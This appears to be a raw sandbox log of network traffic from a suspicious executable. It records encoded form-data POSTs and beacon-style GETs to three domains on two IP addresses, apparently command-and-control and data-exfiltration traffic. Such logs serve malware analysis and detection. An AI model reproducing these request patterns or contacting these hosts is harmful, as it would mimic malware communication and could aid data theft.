                                                                                                                    Data Ascii: Qzj=6znhTvCysq/1eDp5cKepZtWpMMsXt2CE7t+lx3zGFyb19FtjbmZkBYMPSMOR0opcfEn8bpaFplFv6Q24WOwU6wqiJbuVgNZk9njrkygI7Pcg9WS0xOB8Aew6EfltqPu4cTCEQOHXqdtM+zFEH2YbdJ/h7HY5foMr6tzItgG9qp7UXV7sRgy1QcqTdbf819RGvepFf/fzl1rqt4yfaZNP3/U=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    43192.168.2.45004513.248.169.48805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:09:43.998207092 CEST10903OUTPOST /qwed/ HTTP/1.1
                                                                                                                    Host: www.lunch.delivery
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.lunch.delivery
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10300
                                                                                                                    Referer: http://www.lunch.delivery/qwed/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 36 7a 6e 68 54 76 43 79 73 71 2f 31 65 44 70 35 63 4b 65 70 5a 74 57 70 4d 4d 73 58 74 32 43 45 37 74 2b 6c 78 33 7a 47 46 79 54 31 39 7a 68 6a 4a 33 5a 6b 41 59 4d 50 64 63 4f 51 30 6f 70 52 66 45 2f 34 62 70 6d 7a 70 6e 39 76 37 79 2b 34 51 2f 77 55 76 41 71 69 41 37 75 51 75 74 5a 39 39 6e 7a 30 6b 79 77 49 37 50 63 67 39 56 36 30 34 38 35 38 54 75 77 39 55 2f 6c 68 68 76 75 51 63 54 61 79 51 4f 44 74 71 75 6c 4d 2b 54 56 45 42 44 45 62 62 5a 2f 6a 38 48 59 78 66 6f 41 4f 36 73 62 2b 74 6a 61 62 71 70 50 55 62 68 32 7a 41 79 47 31 46 39 57 30 43 36 65 5a 38 36 46 78 67 2f 70 5a 51 63 48 66 7a 58 76 37 31 36 54 4a 50 59 6c 56 31 4a 39 73 33 6d 55 38 78 67 79 67 59 69 65 65 43 73 30 64 34 6f 56 2f 5a 36 36 78 57 48 32 61 6c 48 79 69 69 77 48 6a 4a 32 43 68 62 2f 4f 36 53 47 4b 54 70 43 50 45 6b 66 39 45 38 52 6e 30 62 31 56 39 65 6e 30 6e 68 35 62 49 4e 51 43 5a 72 2b 79 78 73 65 76 78 71 35 32 56 45 30 72 58 45 61 7a 51 59 6c 78 76 7a 4b 78 63 71 79 6f 5a 71 37 72 4e 37 4a 4b 75 6d 76 [TRUNCATED]
                                                                                                                    Data Ascii: Qzj=6znhTvCysq/1eDp5cKepZtWpMMsXt2CE7t+lx3zGFyT19zhjJ3ZkAYMPdcOQ0opRfE/4bpmzpn9v7y+4Q/wUvAqiA7uQutZ99nz0kywI7Pcg9V604858Tuw9U/lhhvuQcTayQODtqulM+TVEBDEbbZ/j8HYxfoAO6sb+tjabqpPUbh2zAyG1F9W0C6eZ86Fxg/pZQcHfzXv716TJPYlV1J9s3mU8xgygYieeCs0d4oV/Z66xWH2alHyiiwHjJ2Chb/O6SGKTpCPEkf9E8Rn0b1V9en0nh5bINQCZr+yxsevxq52VE0rXEazQYlxvzKxcqyoZq7rN7JKumvRnTqgMVEdB6IvZgzI1bWYBur692gfpyd+zBZjioxk7npS9H8EZ5UYPQE+kmW+OF6GM/n57MQEgrMKpp0AadHcB2jgubqn0YTJOyXCh7WCclXD+1CsXJso7NyVchLS+c4QCpTRgsrmKXvKJcjVTLse6M3vVehZO6kF4WTfqM4ZCB3dQxu8bwJW1aLOBJtHOhquaJS+jMJw2es7v+4OKdYZWgmUB11nfMLXp9CUWZpnt2tqOZmkxkJKPQ6x2f1eg/97jNOEu67SxMUT4vE/R8U6BxZCu6982lZLopD1v1rCmxOUE7hp6w+rpWQA0DRfCPIXYPQhhWCQdujEG4uSYJGLfXCNjGOeMcdib/ZgHXS/Ld+2kE1eZ6s93bOQHWxKfgiQD1dCMzU+m+QanwiPQQhRzwV+IrgquIJ93UHl5wnqeP3fWJvY1+CWrdYl3VsoHXwlqIouyqtMsLR3hDAyJSSs4wyYgsjKsZfViU4q3fKj6r+6oMF2pdaLmh5avIr/2ekah+OHf3H6DcR+qCA1g0aNWfB7LF+giybyFkDz3N5mtO7Y9EmoffvAL6RbXekIU85khpCEubLdlGMGZKcXcaqVgkQIFVDI4OK7qzv4I5Wn9OZ1wnUGrbBro63oe4kjEUuH0VzjpSLYSi5emR3tgb+MIT0nnxBMx6LhD [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    44192.168.2.45004613.248.169.48805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:09:46.543308020 CEST533OUTGET /qwed/?Qzj=3xPBQa2W6ZGmKQ9eZ4Wsc/iyYd0uukSyxcTE+lTJMU/LzzcDJGN7AbwmZfmE7bRgUl3cSaaIlgRs7XOqQeV161XTOJOG3ZFD8XPlmSsUpfcf+2m+08EeHO0=&Znyl=2rnxDB HTTP/1.1
                                                                                                                    Host: www.lunch.delivery
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Oct 24, 2024 05:09:47.209832907 CEST391INHTTP/1.1 200 OK
                                                                                                                    Server: openresty
                                                                                                                    Date: Thu, 24 Oct 2024 03:09:47 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 251
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 7a 6a 3d 33 78 50 42 51 61 32 57 36 5a 47 6d 4b 51 39 65 5a 34 57 73 63 2f 69 79 59 64 30 75 75 6b 53 79 78 63 54 45 2b 6c 54 4a 4d 55 2f 4c 7a 7a 63 44 4a 47 4e 37 41 62 77 6d 5a 66 6d 45 37 62 52 67 55 6c 33 63 53 61 61 49 6c 67 52 73 37 58 4f 71 51 65 56 31 36 31 58 54 4f 4a 4f 47 33 5a 46 44 38 58 50 6c 6d 53 73 55 70 66 63 66 2b 32 6d 2b 30 38 45 65 48 4f 30 3d 26 5a 6e 79 6c 3d 32 72 6e 78 44 42 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Qzj=3xPBQa2W6ZGmKQ9eZ4Wsc/iyYd0uukSyxcTE+lTJMU/LzzcDJGN7AbwmZfmE7bRgUl3cSaaIlgRs7XOqQeV161XTOJOG3ZFD8XPlmSsUpfcf+2m+08EeHO0=&Znyl=2rnxDB"}</script></head></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    45192.168.2.4500473.33.130.190805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:09:52.287062883 CEST810OUTPOST /te6q/ HTTP/1.1
                                                                                                                    Host: www.allinathletes.biz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.allinathletes.biz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 200
                                                                                                                    Referer: http://www.allinathletes.biz/te6q/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 4d 67 51 63 48 52 53 39 53 6b 72 6c 4d 5a 46 2f 5a 37 4e 35 4d 5a 31 67 54 2b 75 56 70 4b 49 75 37 42 67 61 5a 6f 70 2b 69 6f 57 43 4b 61 30 55 67 55 4b 65 69 6c 2b 61 65 46 57 7a 39 36 66 4a 50 78 76 51 47 55 34 67 6c 44 6f 30 4b 50 41 35 79 61 6b 34 4f 56 6d 38 57 4e 44 55 64 72 70 52 46 74 7a 2f 71 76 53 2f 78 6d 41 49 4e 49 64 61 5a 49 6c 67 66 30 4f 47 61 4e 63 67 38 6b 36 6d 62 37 5a 6f 6d 58 6d 79 51 69 45 34 55 34 68 56 4a 57 4f 31 72 34 37 2b 66 32 6c 56 49 6c 59 73 77 43 59 48 6f 75 6e 78 30 33 2b 49 33 70 35 77 5a 69 62 72 62 62 39 38 4f 66 72 63 5a 58 6c 49 4a 41 3d 3d
                                                                                                                    Data Ascii: Qzj=MgQcHRS9SkrlMZF/Z7N5MZ1gT+uVpKIu7BgaZop+ioWCKa0UgUKeil+aeFWz96fJPxvQGU4glDo0KPA5yak4OVm8WNDUdrpRFtz/qvS/xmAINIdaZIlgf0OGaNcg8k6mb7ZomXmyQiE4U4hVJWO1r47+f2lVIlYswCYHounx03+I3p5wZibrbb98OfrcZXlIJA==


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    46192.168.2.4500483.33.130.190805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:09:54.836038113 CEST830OUTPOST /te6q/ HTTP/1.1
                                                                                                                    Host: www.allinathletes.biz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.allinathletes.biz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 220
                                                                                                                    Referer: http://www.allinathletes.biz/te6q/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 4d 67 51 63 48 52 53 39 53 6b 72 6c 4e 35 31 2f 57 34 6c 35 45 5a 31 6e 50 75 75 56 67 71 49 71 37 42 73 61 5a 70 63 37 69 2b 2b 43 4b 37 45 55 79 42 2b 65 68 6c 2b 61 55 6c 58 35 67 4b 66 30 50 78 72 79 47 55 45 67 6c 44 38 30 4b 50 51 35 79 70 4d 37 4f 46 6d 2b 44 39 44 57 54 4c 70 52 46 74 7a 2f 71 76 48 61 78 6d 49 49 4d 34 74 61 61 74 46 6e 57 55 4f 4a 51 74 63 67 34 6b 37 74 62 37 5a 4b 6d 57 37 64 51 6b 49 34 55 36 70 56 4b 48 4f 32 69 34 37 38 53 57 6b 38 43 45 41 6c 31 79 5a 51 69 50 66 39 71 7a 4b 6f 37 50 6f 71 49 54 36 38 4a 62 5a 50 54 59 69 6f 55 55 59 42 53 41 45 58 2f 45 48 62 36 36 45 76 6e 43 38 2b 47 37 66 67 77 2f 4d 3d
                                                                                                                    Data Ascii: Qzj=MgQcHRS9SkrlN51/W4l5EZ1nPuuVgqIq7BsaZpc7i++CK7EUyB+ehl+aUlX5gKf0PxryGUEglD80KPQ5ypM7OFm+D9DWTLpRFtz/qvHaxmIIM4taatFnWUOJQtcg4k7tb7ZKmW7dQkI4U6pVKHO2i478SWk8CEAl1yZQiPf9qzKo7PoqIT68JbZPTYioUUYBSAEX/EHb66EvnC8+G7fgw/M=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    47192.168.2.4500493.33.130.190805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:09:57.459743977 CEST10912OUTPOST /te6q/ HTTP/1.1
                                                                                                                    Host: www.allinathletes.biz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.allinathletes.biz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10300
                                                                                                                    Referer: http://www.allinathletes.biz/te6q/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 4d 67 51 63 48 52 53 39 53 6b 72 6c 4e 35 31 2f 57 34 6c 35 45 5a 31 6e 50 75 75 56 67 71 49 71 37 42 73 61 5a 70 63 37 69 2b 32 43 4e 4e 34 55 67 79 57 65 67 6c 2b 61 59 46 58 36 67 4b 66 54 50 77 50 32 47 55 4a 62 6c 46 77 30 49 70 63 35 30 59 4d 37 45 46 6d 2b 63 74 44 58 64 72 6f 4c 46 74 6a 7a 71 76 58 61 78 6d 49 49 4d 2b 4a 61 4f 49 6c 6e 61 30 4f 47 61 4e 63 57 38 6b 37 46 62 34 70 77 6d 57 2f 33 51 55 6f 34 55 61 5a 56 50 31 6d 32 2f 49 37 36 65 32 6b 6b 43 45 39 39 31 79 56 63 69 50 36 53 71 30 69 6f 34 59 42 52 51 58 4b 66 54 4e 31 31 4e 34 2b 34 62 32 77 53 56 79 42 71 76 6b 58 6b 70 4a 67 4d 69 77 39 30 64 6f 47 72 74 5a 79 73 2f 67 73 68 46 48 48 6b 42 4c 58 66 70 74 50 51 75 58 67 56 31 57 69 63 37 47 7a 62 49 34 64 56 66 63 77 41 76 4b 34 51 77 41 55 62 48 48 2f 4b 73 4d 61 78 31 58 34 68 46 5a 54 58 64 59 4e 74 76 69 45 36 30 39 72 76 68 4b 44 37 64 32 37 73 4d 66 51 2b 51 53 77 75 58 79 76 4a 48 32 65 50 4c 4e 69 59 46 69 37 51 39 70 31 77 4e 30 4d 53 71 2f 52 43 42 63 [TRUNCATED]
                                                                                                                    Data Ascii: Qzj=MgQcHRS9SkrlN51/W4l5EZ1nPuuVgqIq7BsaZpc7i+2CNN4UgyWegl+aYFX6gKfTPwP2GUJblFw0Ipc50YM7EFm+ctDXdroLFtjzqvXaxmIIM+JaOIlna0OGaNcW8k7Fb4pwmW/3QUo4UaZVP1m2/I76e2kkCE991yVciP6Sq0io4YBRQXKfTN11N4+4b2wSVyBqvkXkpJgMiw90doGrtZys/gshFHHkBLXfptPQuXgV1Wic7GzbI4dVfcwAvK4QwAUbHH/KsMax1X4hFZTXdYNtviE609rvhKD7d27sMfQ+QSwuXyvJH2ePLNiYFi7Q9p1wN0MSq/RCBcpBvPF5FsRkU45aXxoKXVHEULqe4auG8tQIFuMKOzj9HvcHPMG7wnuSh9sZoqTqal4ysMj3avMYM+nVpOhkQ6mf+IYDNA14744gOHvX2Ac5SEqqqClRsedqFxuxh4dHKKKWSzpFw0LVBYszz41+rB85gO/lCklpZAeZcFFCeZcC/zFdVxHJzqUnO+/2SskSHGseGL8UMkS8CnHJ/Rb5x0BirLAdj5g1HlseXXfWKgPjtXpdl6zs6njpU+A5KevDUQRbcYrVo474VjLb69+grvBJ3egRKCejEQAQSAjPrvSTCaGF+eQKLFb/aAaAa3k0tvrbWmpMIAkedgX0v0fqzu8PDZ2Q8xKlSqrsyFukUiD42oQiAIW00Or7S/wV3RVFX/xqt6HBhehA/7VgPlG1aGRSbv78jd4EHYI77jL/0S/9RzldbQ21ZImEuBSuZGbkQZVwCgIgVGQ25IwmeG7byjHKCH3Yz+xL41wRLCD/TJNdCcS6GY2tx/lsxAeQsOPJ18lIUVH4A/KA2qnJnCbU9gsmCsIVQ9yUzqcBnbPGTiM0ZDC80ikZrOc4fADBvJ9IxqjAIWVsvpqGMLcWqIlUuMtVcbs2eXTzRAGqb17yI5nzY0zzuIlfA919an3lkmG+Kl8dGBgF+yyburzPZl6q5hPRr7bpZ4NNCa4C [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    48192.168.2.4500503.33.130.190805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:10:00.182157040 CEST536OUTGET /te6q/?Qzj=Bi48EnnHLnucFoFteZ9CbIdOGuitqrUowmdcea1K+IX7Dd8zgRCPoEq+V26bo8zYK23oBEB5tVQZMZR237sZHxvwddrlAP0HIvOhneqwjksiJ5dMJ78gJU0=&Znyl=2rnxDB HTTP/1.1
                                                                                                                    Host: www.allinathletes.biz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Oct 24, 2024 05:10:00.777281046 CEST391INHTTP/1.1 200 OK
                                                                                                                    Server: openresty
                                                                                                                    Date: Thu, 24 Oct 2024 03:10:00 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 251
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 7a 6a 3d 42 69 34 38 45 6e 6e 48 4c 6e 75 63 46 6f 46 74 65 5a 39 43 62 49 64 4f 47 75 69 74 71 72 55 6f 77 6d 64 63 65 61 31 4b 2b 49 58 37 44 64 38 7a 67 52 43 50 6f 45 71 2b 56 32 36 62 6f 38 7a 59 4b 32 33 6f 42 45 42 35 74 56 51 5a 4d 5a 52 32 33 37 73 5a 48 78 76 77 64 64 72 6c 41 50 30 48 49 76 4f 68 6e 65 71 77 6a 6b 73 69 4a 35 64 4d 4a 37 38 67 4a 55 30 3d 26 5a 6e 79 6c 3d 32 72 6e 78 44 42 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Qzj=Bi48EnnHLnucFoFteZ9CbIdOGuitqrUowmdcea1K+IX7Dd8zgRCPoEq+V26bo8zYK23oBEB5tVQZMZR237sZHxvwddrlAP0HIvOhneqwjksiJ5dMJ78gJU0=&Znyl=2rnxDB"}</script></head></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    49192.168.2.4500513.33.130.190805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:10:05.831948042 CEST816OUTPOST /el3s/ HTTP/1.1
                                                                                                                    Host: www.barbequecritics.com
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.barbequecritics.com
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 200
                                                                                                                    Referer: http://www.barbequecritics.com/el3s/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 33 52 79 58 65 32 4e 53 62 58 2f 54 4a 6d 53 6a 2f 4b 65 55 37 4a 74 79 47 36 2b 49 52 39 63 61 54 69 76 78 4d 68 58 50 56 55 6c 70 61 4e 67 4b 6a 35 4a 65 51 47 63 70 42 5a 48 7a 45 50 6d 6d 65 72 53 50 78 59 47 6a 56 6b 34 4c 57 74 4d 49 69 46 58 62 79 64 62 51 6b 70 54 79 2b 56 61 44 6a 61 67 4a 41 68 76 58 7a 45 51 6a 6d 47 35 35 71 52 6c 31 6a 46 30 7a 62 7a 33 58 47 6f 67 4b 72 6b 33 6e 57 63 63 43 45 49 77 43 76 2b 42 62 42 45 5a 6a 77 71 6f 72 76 6e 2f 52 46 39 4b 54 64 6e 33 57 72 68 73 38 43 59 44 53 6f 2b 67 58 65 4d 44 31 58 48 42 6f 44 73 4a 74 65 6f 71 75 49 41 3d 3d
                                                                                                                    Data Ascii: Qzj=3RyXe2NSbX/TJmSj/KeU7JtyG6+IR9caTivxMhXPVUlpaNgKj5JeQGcpBZHzEPmmerSPxYGjVk4LWtMIiFXbydbQkpTy+VaDjagJAhvXzEQjmG55qRl1jF0zbz3XGogKrk3nWccCEIwCv+BbBEZjwqorvn/RF9KTdn3Wrhs8CYDSo+gXeMD1XHBoDsJteoquIA==


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    50192.168.2.4500523.33.130.190805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:10:08.375042915 CEST836OUTPOST /el3s/ HTTP/1.1
                                                                                                                    Host: www.barbequecritics.com
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.barbequecritics.com
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 220
                                                                                                                    Referer: http://www.barbequecritics.com/el3s/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 33 52 79 58 65 32 4e 53 62 58 2f 54 49 46 61 6a 2b 70 47 55 35 70 74 31 44 36 2b 49 48 4e 63 65 54 69 6a 78 4d 67 54 6c 56 68 31 70 66 63 51 4b 69 38 39 65 58 47 63 70 4b 35 48 32 4b 76 6d 39 65 71 75 39 78 63 47 6a 56 6c 59 4c 57 74 38 49 69 30 58 63 7a 4e 62 57 38 5a 54 30 39 6c 61 44 6a 61 67 4a 41 68 37 39 7a 45 49 6a 6e 32 4a 35 72 77 6c 36 2f 56 30 73 53 54 33 58 4e 49 67 47 72 6b 33 2f 57 64 51 37 45 4c 45 43 76 36 4e 62 51 31 5a 67 2b 71 6f 74 77 33 2b 44 44 6f 33 4c 55 46 4f 4c 32 51 4d 2f 49 59 58 52 6b 59 78 4e 50 39 69 69 46 48 6c 62 65 72 41 5a 54 72 58 6e 54 46 43 61 4d 4a 58 64 70 2f 61 6a 50 72 49 5a 4c 55 72 62 4d 39 59 3d
                                                                                                                    Data Ascii: Qzj=3RyXe2NSbX/TIFaj+pGU5pt1D6+IHNceTijxMgTlVh1pfcQKi89eXGcpK5H2Kvm9equ9xcGjVlYLWt8Ii0XczNbW8ZT09laDjagJAh79zEIjn2J5rwl6/V0sST3XNIgGrk3/WdQ7ELECv6NbQ1Zg+qotw3+DDo3LUFOL2QM/IYXRkYxNP9iiFHlberAZTrXnTFCaMJXdp/ajPrIZLUrbM9Y=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    51192.168.2.4500533.33.130.190805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:10:10.928344011 CEST10918OUTPOST /el3s/ HTTP/1.1
                                                                                                                    Host: www.barbequecritics.com
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.barbequecritics.com
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10300
                                                                                                                    Referer: http://www.barbequecritics.com/el3s/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 33 52 79 58 65 32 4e 53 62 58 2f 54 49 46 61 6a 2b 70 47 55 35 70 74 31 44 36 2b 49 48 4e 63 65 54 69 6a 78 4d 67 54 6c 56 68 39 70 44 2b 59 4b 69 66 56 65 57 47 63 70 57 70 48 33 4b 76 6e 76 65 72 47 35 78 63 44 65 56 67 63 4c 57 50 30 49 6b 41 6a 63 38 4e 62 57 31 35 54 78 2b 56 61 57 6a 5a 59 57 41 68 72 39 7a 45 49 6a 6e 31 52 35 37 52 6c 36 39 56 30 7a 62 7a 32 59 47 6f 67 69 72 6b 2f 76 57 64 55 30 45 39 30 43 76 61 64 62 53 6e 68 67 79 71 6f 76 7a 33 2f 47 44 6f 7a 71 55 46 53 48 32 51 35 61 49 61 4c 52 33 76 63 73 4c 2b 36 74 57 6d 49 46 45 5a 51 70 56 38 33 43 4c 6d 43 52 4d 4b 44 78 31 38 6d 4b 55 49 74 4c 66 6c 43 65 51 62 62 51 38 47 73 2f 4d 38 2f 6f 53 56 54 74 6f 51 5a 4d 51 6c 69 45 41 68 47 63 51 42 5a 2b 59 4a 34 65 69 4c 34 63 6d 79 55 52 44 4c 6e 7a 31 2b 56 49 47 62 6d 51 76 61 34 53 4c 77 31 32 37 38 5a 77 4a 61 46 6a 59 57 53 46 30 78 79 39 71 62 64 59 65 70 6d 78 61 34 30 7a 41 6a 62 6e 59 6b 54 44 66 50 6f 61 52 64 79 6c 4d 6a 74 35 49 46 37 70 57 46 67 34 33 45 [TRUNCATED]
